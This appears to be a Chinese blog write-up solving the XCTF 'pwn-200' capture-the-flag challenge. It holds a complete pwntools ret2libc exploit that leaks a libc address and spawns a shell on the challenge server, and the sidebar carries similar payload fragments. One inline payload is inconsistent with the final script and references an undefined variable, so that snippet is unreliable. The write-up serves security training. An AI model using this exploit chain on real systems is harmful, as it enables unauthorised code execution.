攻防世界 pwn-200

已于 2023-03-20 18:34:16 修改
阅读量155 收藏
点赞数
分类专栏: pwn题 文章标签: 安全 网络安全 linux
于 2023-03-20 18:30:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56777139/article/details/129411273
版权

32位 ret2libc

题目下载连接

checksec

在这里插入图片描述
查看防护,无PIE与CANARY

IDA

main函数
在这里插入图片描述
sub_8048484()函数
在这里插入图片描述

分析

可以明显看到sub_8048484()函数当中存在溢出漏洞,程序又没有canary保护,那就比较简单
利用溢出泄露got表

elf=ELF('./ctf')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr = 0x080484BE
p.recvuntil('Welcome to XDCTF2015~!\n')
payload=b'a'*0x6c+b'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
p.sendline(payload)

然后就可以接收got表了

write_addr=u32(p.recv(4))

再利用LibcSearcher找到system与/bin/sh地址

from LibcSearcher import *
libc = LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')

返回主函数后,再次利用漏洞即可

payload=b'a'*0x8c+b'a'*0x4+p32(system)+b'a'*a+p32(bin_sh)
p.sendline(payload)
p.interactive()

exp

from pwn import *
from LibcSearcher import *
p = remote("61.147.171.105",54546)
elf=ELF('./ctf')


write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr = 0x080484BE
p.recvuntil("Welcome to XDCTF2015~!\n")
payload=b'a'*0x6c+b'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
p.sendline(payload)
write_addr = u32(p.recv(4))
libc = LibcSearcher('write',write_addr)  
libc_base = write_addr - libc.dump('write')  
system_addr = libc_base + libc.dump('system')  
bin_sh = libc_base + libc.dump('str_bin_sh')

payload=b'a'*0x6c+b'a'*0x4+p32(system_addr)+p32(main_addr)+p32(bin_sh)
p.recvuntil("Welcome to XDCTF2015~!\n")
p.sendline(payload)
p.interactive()
Zzzzzz!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 393
做题记录
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 572
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
攻防世界pwn200
qq_25044201的博客
01-17 234
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
攻防世界 pwn200 WP
Zarcs_233的博客
01-28 436
32位栈溢出程序 具体思路(ROP): 1.搞到system函数地址,可以通过dynelf 2.写入’/bin/sh’,用做system参数 3.调用system函数 EXP: from pwn import * context.log_level='debug' p=remote("111.198.29.45",30502) start=0x80483D0 #程序起始代码,实现复用 def...
pwn-200题目文件
02-16
pwn-200题目文件
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1691
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2169
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
攻防世界-pwn-200-Writeup
SkYe's Blog
05-15 359
pwn-200 [collapse title=“展开查看详情” status=“false”]考点:栈溢出、泄露地址 漏洞函数如下: ssize_t sub_8048484() { char buf; // [esp+1Ch] [ebp-6Ch] setbuf(stdin, &buf); return read(0, &buf, 0x100u);//溢出 } 可操作空间空间很长就不需要什么骚操作了。就是没给 libc 文件,需要去libc database 查一下而已。查到
XCTF PWN高手进阶区之pwn-200
neuisf的博客
01-29 636
此题,setbuf未发现有什么作用! exp: from pwn import * sub_addr=0x8048484 def leak(addr): payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4) p.sendline(payload) return p.recv()[:4] p=process("./p...
pwn200,一道不完全考察ret2libc的小小pwn题
shanwei274的博客
04-08 342
pwn200 —XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。 1.获取pwn题 啪的一下就下载好了。 2.查看保护 拿到题我不做,哎,我干什么呢,我先查看保护! 裸奔题,开的东西不多,所以这里就看我们发挥了 3.ida看看 首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我
pwn-200(xctf)
weixin_43868725的博客
08-08 597
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
ADworld pwn wp - pwn-200
fa1c4的blog
06-25 126
明显的栈溢出, 动态链接, 无libc利用, ret2libc, 板子打法, 用pwntools的DynELF模块泄露libc地址, 原理是结合puts或writes函数泄露地址, 所以有两个利用条件: 漏洞可以泄露libc地址 漏洞可以反复利用(ret 回到函数开头继续执行) write函数 头文件:#include <unistd.h> 定义函数:ssize_t write (int fd, const void * buf, size_t count); 函数说明:write(...
攻防世界PWN之interpreter-200题解
seaaseesa的博客
02-06 580
interpreter-200 这是一个befunge程序解释器,befunge程序的语法参考https://www.jianshu.com/p/ed929cf72312,还有官方的文档在https://esolangs.org/wiki/Befunge 另外本文参考国外的一篇,加以自己的理解,做了简化 https://uaf.io/exploitation/2016/09/05/Tokyo...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值